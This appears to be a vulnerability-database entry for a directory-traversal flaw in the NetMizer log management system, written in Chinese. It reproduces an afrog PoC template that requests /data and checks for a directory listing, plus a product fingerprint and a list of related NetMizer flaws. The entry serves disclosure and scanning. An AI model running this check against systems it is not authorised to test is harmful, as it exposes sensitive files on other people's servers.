netmizer-log-management-data-directory-traversal: NetMizer 日志管理系统 data 目录遍历漏洞

日期: 2025-09-01 | 影响软件: NetMizer日志管理系统 | POC: 已公开

漏洞描述

北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞，由于 /data 控制不严格，攻击者可利用该漏洞获取敏感信息。 title="NetMizer 日志管理系统"

PoC代码[已公开]

id: netmizer-log-management-data-directory-traversal

info:
  name: NetMizer 日志管理系统 data 目录遍历漏洞
  author: zan8in
  severity: medium
  description: |
    北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞，由于 /data 控制不严格，攻击者可利用该漏洞获取敏感信息。
    title="NetMizer 日志管理系统"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/NetMizer/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20data%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /data
    expression: response.status == 200 && response.body.bcontains(b'Index of /data') && response.body.bcontains(b'Parent Directory')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/netmizer-log-management-data-directory-traversal.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

NetMizer 日志管理系统 任意代码执行漏洞 无POC

NetMizer日志管理系统 /data/search/troubleip.php 命令执行漏洞 无POC

NetMizer日志管理系统 terminals.php SQL注入漏洞 无POC

NetMizer日志管理系统dirlist.php目录遍历漏洞 无POC

netmizer日志管理系统serverconf.php-未授权访问 无POC

NetMizer 日志管理系统任意代码执行漏洞无POC

NetMizer日志管理系统 /data/search/troubleip.php 命令执行漏洞无POC

NetMizer日志管理系统 terminals.php SQL注入漏洞无POC

NetMizer日志管理系统dirlist.php目录遍历漏洞无POC

netmizer日志管理系统serverconf.php-未授权访问无POC